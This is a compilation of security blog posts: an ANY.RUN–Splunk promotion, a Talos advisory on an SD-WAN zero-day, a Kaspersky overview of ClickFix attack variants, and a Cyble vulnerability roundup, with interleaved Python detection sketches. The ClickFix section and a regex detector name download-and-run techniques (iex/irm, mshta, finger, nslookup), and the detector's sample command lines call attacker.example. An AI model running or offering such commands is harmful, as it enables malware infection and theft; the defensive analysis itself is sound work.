ANY.RUN’s TI Feeds continuously supply verified malicious infrastructure into Splunk. Detection rules can automatically correlate incoming events against fresh indicators, increasing detection accuracy and reducing blind spots.
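The correlation step described here can be pictured with a short, Splunk-independent sketch. It does not use the ANY.RUN add-on or the KV Store API; the `Event` fields, the `correlate` helper, and the placeholder indicators (taken from documentation-reserved ranges) are all assumptions made for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """A simplified network event; the field names are illustrative only."""
    host: str
    dest: str  # destination IP, domain, or URL observed in the event


def correlate(events, indicators):
    """Return the events whose destination matches a known-bad indicator."""
    # Normalise once so that each lookup is case-insensitive and O(1).
    known_bad = {i.strip().lower() for i in indicators}
    return [e for e in events if e.dest.strip().lower() in known_bad]


# Placeholder indicators, not real threat data.
feed = ["203.0.113.7", "malicious.example"]
events = [
    Event("ws-01", "198.51.100.10"),
    Event("ws-02", "Malicious.Example"),
    Event("ws-03", "203.0.113.7"),
]

hits = correlate(events, feed)
print([e.host for e in hits])
```

In a real deployment the equivalent matching would be expressed as a Splunk lookup or correlation search rather than application code; the sketch only shows the underlying set-membership idea.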

The ANY.RUN integrations are available for installation via Splunkbase. Security teams can find and deploy the add-ons directly from the Splunk app marketplace by searching for “ANY.RUN,” enabling fast deployment without complex configuration or custom development.

By embedding sandbox analysis, live enrichment, and verified malicious infrastructure directly into Splunk, ANY.RUN helps SOC teams triage faster, prioritize more accurately, and improve detection logic. The result is lower MTTR, fewer missed incidents, and stronger protection without increasing operational complexity.

Trusted by 600,000+ cybersecurity professionals and 15,000+ organizations across critical industries, including 64% of Fortune 500 companies, ANY.RUN helps security teams detect and investigate threats faster.

Our Interactive Sandbox provides real-time behavioral analysis of suspicious files and URLs, enabling confident triage and response.

Threat Intelligence Lookup and Threat Intelligence Feeds deliver live, verified threat data that strengthens detection and improves prioritization.

By embedding analysis and intelligence into daily SOC workflows, ANY.RUN helps organizations reduce response time, lower operational costs, and minimize security risk.

By embedding behavioral analysis and live threat intelligence directly into Splunk, threats are understood earlier in the attack chain. Earlier understanding leads to faster containment, lower incident impact, and reduced probability of breach-related downtime, fraud, or regulatory exposure.

SOC teams typically see reduced MTTR (up to 21 minutes per case), improved detection rate (up to 36%), and identification of up to 58% more threats through enriched intelligence. These improvements translate into fewer escalations, fewer missed incidents, and more predictable response performance.

The integration enables Tier 1 analysts to close more alerts independently by providing behavioral verdicts and context directly in Splunk. This reduces escalation rates, prevents backlog growth during alert spikes, and helps manage higher alert volumes without increasing headcount.

No architectural overhaul is required. ANY.RUN integrates as native data sources inside Splunk Enterprise. Analysis results and intelligence are ingested as structured events and used within existing dashboards, correlation rules, and response workflows.

Faster alert validation and clearer risk prioritization reduce investigation time per case. This stabilizes response timelines, improves MTTR consistency, and allows MSSPs to support more clients without degrading service quality.

The post ANY.RUN & Splunk Enterprise: Stronger Detection, Faster Response in Your SOC appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Cisco Talos is tracking the active exploitation of CVE-2026-20127, a vulnerability in Cisco Catalyst SD-WAN Controller (formerly vSmart) that allows an unauthenticated remote attacker to bypass authentication by sending a crafted request to an affected system. Successful exploitation may give the attacker administrative privileges on the Controller as an internal, high-privileged, non-root user account.

Talos clusters this exploitation and the subsequent post-compromise activity as “UAT-8616,” which we assess with high confidence to be a highly sophisticated cyber threat actor. After discovering active exploitation of the 0-day in the wild, we found evidence that the malicious activity went back at least three years (to 2023). An investigation conducted by intelligence partners identified that the actor likely escalated to the root user via a software version downgrade. The actor then reportedly exploited CVE-2022-20775 before restoring the original software version, effectively gaining root access.

UAT-8616’s attempted exploitation indicates a continuing trend of cyber threat actors targeting network edge devices to establish persistent footholds in high-value organizations, including Critical Infrastructure (CI) sectors.

Customers are strongly advised to follow the guidance published in the security advisories discussed below. Additional recommendations specific to Cisco are available here. Customer support is also available by initiating a TAC request. Talos strongly recommends that customers and partners using Cisco Catalyst SD-WAN technology follow the steps outlined in this advisory to help protect their environments.

The initial and most critical activity to look for is any control connection peering event identified in Cisco Catalyst SD-WAN logs, as this may indicate an attempt at initial access via CVE-2026-20127. All such peering events require manual validation to confirm their legitimacy, with particular focus on vManage peering types. Threat actors who compromise Cisco Catalyst SD-WAN infrastructure often establish unauthorized peer connections that may appear superficially normal but occur at unexpected times, originate from unrecognized IP addresses, or involve device types inconsistent with the environment’s architecture. A comprehensive review process is essential to distinguish between legitimate network operations and potential indicators of compromise.

Feb 20 22:03:33 vSmart-01 VDAEMON_0[2571]: %Viptela-vSmart-VDAEMON_0-5-NTCE-1000001: control-connection-state-change new-state:up peer-type:vmanage peer-system-ip:1.1.1.10 public-ip:192.168.3.20 public-port:12345 domain-id:1 site-id:1005

In this example, validate that the peer-system-ip matches the IP address schema in use, that the timestamp coincides with an event that could legitimately cause peering, and that the public-ip is an expected source for a peering event.
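As a rough illustration of this review, the sketch below parses the sample log line and flags addresses that fall outside an allow-list. The function names and the "expected" networks are hypothetical and must be replaced with values from your own environment; timestamp validation against change windows is not covered.

```python
import ipaddress
import re

LOG = ("Feb 20 22:03:33 vSmart-01 VDAEMON_0[2571]: "
       "%Viptela-vSmart-VDAEMON_0-5-NTCE-1000001: control-connection-state-change "
       "new-state:up peer-type:vmanage peer-system-ip:1.1.1.10 "
       "public-ip:192.168.3.20 public-port:12345 domain-id:1 site-id:1005")

MARKER = "control-connection-state-change"
# Matches key:value tokens such as "peer-type:vmanage".
FIELD_RE = re.compile(r"([a-z-]+):(\S+)")


def parse_peering_event(line):
    """Return the key:value fields of a peering event line, or None."""
    if MARKER not in line:
        return None
    # Parse only the text after the marker to skip the syslog header.
    tail = line.split(MARKER, 1)[1]
    return dict(FIELD_RE.findall(tail))


def review_flags(fields, system_nets, public_nets):
    """List the reasons why a peering event needs manual attention."""
    flags = []
    sys_ip = ipaddress.ip_address(fields["peer-system-ip"])
    pub_ip = ipaddress.ip_address(fields["public-ip"])
    if not any(sys_ip in net for net in system_nets):
        flags.append("peer-system-ip outside expected schema")
    if not any(pub_ip in net for net in public_nets):
        flags.append("public-ip is not an expected peering source")
    return flags


# Hypothetical allow-lists, for illustration only.
expected_system = [ipaddress.ip_network("1.1.1.0/24")]
expected_public = [ipaddress.ip_network("10.0.0.0/8")]

event = parse_peering_event(LOG)
print(event["peer-type"], review_flags(event, expected_system, expected_public))
```

A script like this can only narrow down which events to look at first; every peering event still requires the manual validation described above.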

The following may be high-fidelity indicators of a successful compromise by UAT-8616 in an SD-WAN infrastructure setup:

We strongly recommend that you perform the steps outlined in this document. Cisco has also published a hardening guide for Cisco Catalyst SD-WAN deployments located at https://sec.cloudapps.cisco.com/security/center/resources/Cisco-Catalyst-SD-WAN-HardeningGuide. It is strongly recommended that any customers who are utilizing the Cisco Catalyst SD-WAN technology follow the guidance provided in this hardening guide. We also recommend referring to advisories here and here and the Cisco Catalyst SD-WAN threat hunting guide released by our intelligence partners for additional detection guidance.

Talos is releasing the following Snort coverage for this threat and associated vulnerability:

Cisco Talos Blog – Read More

About a year ago, we published a post about the ClickFix technique, which was gaining popularity among attackers. The essence of ClickFix attacks boils down to convincing the victim, under various pretexts, to run a malicious command on their computer. From a security solution’s point of view, the command is therefore run on behalf of the active user and with their privileges.

In early uses of this technique, cybercriminals tried to convince victims that they need to execute a command to fix some problem or to pass a captcha, and in the vast majority of cases, the malicious command was a PowerShell script. However, since then, attackers have come up with a number of new tricks that users should be warned about, as well as a number of new variants of malicious payload delivery, which are also worth keeping an eye on.

Last year, Microsoft experts published a report on cyberattacks targeting hotel owners working with Booking.com. The attackers sent out fake notifications from the service, or emails pretending to be from guests drawing attention to a review. In both cases, the email contained a link to a website imitating Booking.com, which asked the victim to prove that they were not a robot by running a code via the Run menu.

There are two key differences between this attack and the original ClickFix scheme. First, the user isn’t asked to copy the string (after all, a string with code sometimes arouses suspicion). Instead, the malicious site copies it to the clipboard, probably when the user clicks a checkbox that mimics the reCAPTCHA mechanism. Second, the malicious string calls the legitimate mshta.exe utility, which is used to run HTML Applications (HTA). It contacts the attackers’ server and executes the malicious payload.

BleepingComputer published an article in October 2025 about a campaign spreading malware through instructions in TikTok videos. The videos themselves imitate video tutorials on how to activate proprietary software for free. The advice they give boils down to a need to run PowerShell with administrator rights and then execute the command iex (irm {address}). Here, the irm command downloads a malicious script from a server controlled by attackers, and the iex (Invoke-Expression) command runs it. The script, in turn, downloads an infostealer malware to the victim’s computer.

Another unusual variant of the ClickFix attack uses the familiar captcha trick, but the malicious script uses the outdated Finger protocol. The utility of the same name allows anyone to request data about a specific user on a remote server. The protocol is rarely used nowadays, but it is still supported by Windows, macOS, and a number of Linux-based systems.

The user is persuaded to open the command line interface and use it to run a command that establishes a connection via the Finger protocol (using TCP port 79) with the attackers’ server. The protocol only transfers text information, but this is enough to download another script to the victim’s computer, which then installs the malware.

Another variant of ClickFix differs in that it uses more sophisticated social engineering. It was used in an attack on users trying to find a tool to block advertising banners, trackers, malware, and other unwanted content on web pages. When searching for a suitable extension for Google Chrome, victims found something called NexShield – Advanced Web Guardian, which was in fact a clone of real, working software. At some point, however, it crashed the browser and displayed a fake notification about a detected security problem and the need to run a “scan” to fix the error. If the user agreed, they received instructions on how to open the Run menu and execute a command that the extension had previously copied to the clipboard.

The command copied the familiar finger.exe file to a temporary directory, renamed it ct.exe, and then launched it with the attacker’s address. The rest of the attack was the same as in the abovementioned case. In response to the Finger protocol request, a malicious script was delivered, which launched and installed a remote access Trojan (in this case, ModeloRAT).

The Microsoft Threat Intelligence team also described a ClickFix variant that is slightly more complex than usual. Unfortunately, they didn’t describe the social engineering trick, but the method of delivering the malicious payload is quite interesting. Probably to complicate detection of the attack in a corporate environment and prolong the life of the malicious infrastructure, the attackers added an extra step: contacting a DNS server under their control.

That is, after the victim is somehow persuaded to copy and execute a malicious command, the legitimate nslookup utility sends a request on behalf of the user for data on the example.com domain. The command contains the address of a specific DNS server controlled by the attackers. The server’s response includes, among other things, a string containing a malicious script, which in turn downloads the final payload (in this attack, ModeloRAT again).
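The delivery methods described so far (mshta.exe with a remote address, PowerShell `iex (irm ...)`, the Finger utility, and nslookup with an explicitly specified server) leave recognizable traces in process command lines. The sketch below shows how such command lines might be flagged for review. The regular expressions and the `classify` helper are illustrative assumptions, not vendor detection signatures, and the sample addresses use reserved documentation names.

```python
import re

# Heuristic patterns, one per delivery technique. Illustrative only.
PATTERNS = {
    # mshta pointed at a remote URL
    "mshta-remote": re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I),
    # Invoke-Expression wrapped around Invoke-RestMethod
    "powershell-iex-irm": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:irm|invoke-restmethod)\b", re.I),
    # finger [options] [user]@host
    "finger": re.compile(r"\bfinger(?:\.exe)?\s+(?:-\S+\s+)*\S*@\S+", re.I),
    # nslookup [options] name server (a second positional argument is the server)
    "nslookup-explicit-server": re.compile(
        r"\bnslookup(?:\.exe)?\s+(?:-\S+\s+)*[^-\s]\S*\s+[^-\s]\S*", re.I),
}


def classify(command_line):
    """Return the sorted names of all patterns that match the command line."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(command_line))


samples = [
    "mshta https://attacker.example/x",
    "powershell iex (irm https://attacker.example/a)",
    "finger user@attacker.example",
    "nslookup example.com 203.0.113.53",
    "nslookup example.com",
]
for cmd in samples:
    print(cmd, "->", classify(cmd))
```

Name-based matching is easy to evade: in the NexShield case the attackers renamed finger.exe to ct.exe, which these patterns would miss. Heuristics like these are at best a supplement to the awareness training and protective measures discussed below.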

The next attack variant is interesting for its multi-stage social engineering. In comments on Pastebin, attackers actively spread a message about an alleged flaw in the Swapzone.io cryptocurrency exchange service. Cryptocurrency owners were invited to visit a resource created by fraudsters, which contained full instructions on how to exploit this flaw and supposedly make up to $13,000 in a couple of days.

The instructions explain how the service’s flaws can be exploited to exchange cryptocurrency at a more favorable rate. To do this, a victim needs to open the service’s website in the Chrome browser, manually type “javascript:” in the address bar, and then paste the JavaScript script copied from the attackers’ website and execute it. In reality, of course, the script cannot affect exchange rates in any way; it simply replaces Bitcoin wallet addresses and, if the victim actually tries to exchange something, transfers the funds to the attackers’ accounts.

The simplest attacks using the ClickFix technique can be countered by blocking the [Win] + [R] key combination on work devices. But, as we see from the examples listed, this is far from the only type of attack in which users are asked to run malicious code themselves.

Therefore, the main advice is to raise employee cybersecurity awareness. They must clearly understand that if someone asks them to perform any unusual manipulations with the system, and/or copy and paste code somewhere, then in most cases this is a trick used by cybercriminals. Security awareness training can be organized using the Kaspersky Automated Security Awareness Platform.

In addition, to protect against such cyberattacks, we recommend:

Kaspersky official blog – Read More

Cyble Research & Intelligence Labs (CRIL) tracked 1,102 vulnerabilities last week. Of these, 166 vulnerabilities already have publicly available Proof-of-Concept (PoC) exploits, significantly increasing the likelihood of real-world attacks. A total of 49 vulnerabilities were rated critical under CVSS v3.1, while 32 received critical severity under CVSS v4.0.

Additionally, CISA added 9 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing confirmed active exploitation.

On the industrial front, CISA issued 8 ICS advisories covering 18 vulnerabilities impacting Siemens, Honeywell, Delta Electronics, GE Vernova, PUSR, EnOcean, Valmet, and Welker products.

CVE-2026-1357 — WPvivid Backup & Migration Plugin (Critical)

CVE-2026-1357 is a critical unauthenticated arbitrary file upload and remote code execution vulnerability affecting the WPvivid Backup & Migration plugin for WordPress. The flaw stems from improper handling of RSA decryption errors combined with unsanitized filename inputs, allowing attackers to upload malicious PHP shells to publicly accessible directories.

A public PoC is available, and the vulnerability surfaced in underground discussions shortly after disclosure, significantly lowering the barrier to exploitation.

CVE-2026-1731 — BeyondTrust Remote Support & PRA (Critical)

CVE-2026-1731 is a critical OS command injection vulnerability in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The flaw exists within a WebSocket-based endpoint, allowing unauthenticated attackers to execute arbitrary commands on internet-facing instances.

Successful exploitation enables full system compromise, data exfiltration, lateral movement, and persistent access. A PoC is publicly available.

CVE-2025-49132 — Pterodactyl Panel (Critical)

CVE-2025-49132 affects the Pterodactyl Panel game-server management platform and allows unauthenticated remote code execution through improper validation of user-controlled parameters.

Threat actors were observed sharing weaponized exploits on underground forums, highlighting the vulnerability’s operational risk.

CVE-2026-25639 — Axios HTTP Client (High Severity)

CVE-2026-25639 is a denial-of-service vulnerability in the Axios HTTP client, where crafted JSON payloads exploiting improper configuration merging can crash Node.js or browser applications.

The vulnerability was discussed on underground forums shortly after disclosure and has a public PoC.

CVE-2026-20841 — Windows Notepad (High Severity)

CVE-2026-20841 is a command injection vulnerability in the Windows Notepad app, enabling execution of malicious payloads via specially crafted files. Exploitation could enable privilege escalation and malware deployment.

CISA added 9 vulnerabilities to the KEV catalog during the reporting period.

Notable additions include:

KEV additions serve as strong indicators of exploitation maturity and heightened ransomware or espionage risk.

During the reporting period, CISA issued 8 ICS advisories covering 18 vulnerabilities. The majority were rated high severity.

CVE-2026-1670 — Honeywell CCTV Products (Critical)

CVE-2026-1670 affects Honeywell CCTV products and carries a CVSS score of 9.8. The vulnerability allows an unauthenticated attacker to remotely alter the password recovery email address, effectively hijacking administrator accounts.

Successful exploitation enables:

Because no credentials or user interaction are required, this vulnerability presents a high mass-exploitation risk.

CVE-2026-25715 — PUSR USR-W610 Router (Critical)

CVE-2026-25715 impacts the PUSR USR-W610 router and involves weak password requirements. If exploited, attackers can bypass authentication, compromise administrator credentials, or disrupt services.

The risk is amplified by the vendor’s acknowledgment that the product has reached end-of-life and no patches are planned. Organizations are urged to isolate or replace affected devices immediately.

Siemens Simcenter Vulnerabilities (High Severity Cluster)

Multiple high-severity out-of-bounds read/write and buffer overflow vulnerabilities were disclosed in Siemens Simcenter Femap and Nastran products (CVE-2026-23715 through CVE-2026-23720). These flaws may enable memory corruption and potential code execution in industrial engineering environments.

Analysis of the 18 disclosed ICS vulnerabilities shows that Critical Manufacturing accounts for 61.1% of cases, with the sector appearing in 83.3% of all reported vulnerabilities. This concentration highlights the continued exposure of manufacturing environments and their interdependencies with Energy, Water, and Chemical sectors.

The combination of high-volume IT vulnerabilities, publicly available PoCs, underground exploit discussions, and critical ICS exposures underscores the evolving threat landscape across enterprise and industrial environments.

With 166 PoCs already available and 9 KEV additions confirming active exploitation, organizations must adopt a risk-based vulnerability management approach that prioritizes:

Cyble’s attack surface management solutions enable organizations to continuously monitor exposures, prioritize remediation, and detect early warning signals of exploitation. Additionally, Cyble’s threat intelligence and third-party risk intelligence capabilities provide visibility into vulnerabilities actively discussed in underground communities, empowering proactive defense against both IT and ICS threats.
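The risk-based prioritization described above can be sketched with the IT vulnerabilities from this report. The ordering rule (public exploit first, then severity) is an assumption made for illustration rather than Cyble’s methodology, and KEV membership is omitted because the report’s list of KEV additions is not reproduced here.

```python
from dataclasses import dataclass

SEVERITY_RANK = {"critical": 2, "high": 1}


@dataclass(frozen=True)
class Vuln:
    cve: str
    severity: str         # severity label used in the report
    public_exploit: bool  # a PoC or shared exploit is mentioned in the report


# Flags follow the descriptions above; no PoC is mentioned for CVE-2026-20841.
VULNS = [
    Vuln("CVE-2026-20841", "high", False),
    Vuln("CVE-2026-25639", "high", True),
    Vuln("CVE-2026-1357", "critical", True),
    Vuln("CVE-2026-1731", "critical", True),
    Vuln("CVE-2025-49132", "critical", True),
]


def prioritize(vulns):
    """Order by exploit availability, then severity; ties keep input order."""
    return sorted(
        vulns,
        key=lambda v: (v.public_exploit, SEVERITY_RANK[v.severity]),
        reverse=True,
    )


for v in prioritize(VULNS):
    print(v.cve, v.severity, "public exploit" if v.public_exploit else "no public exploit noted")
```

A production scoring model would also weigh asset exposure, KEV status, and business impact; the two-field key is only meant to show how exploit availability can outrank raw severity.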

The post The Week in Vulnerabilities: WordPress, BeyondTrust, and Critical ICS Bugs appeared first on Cyble.

Cyble – Read More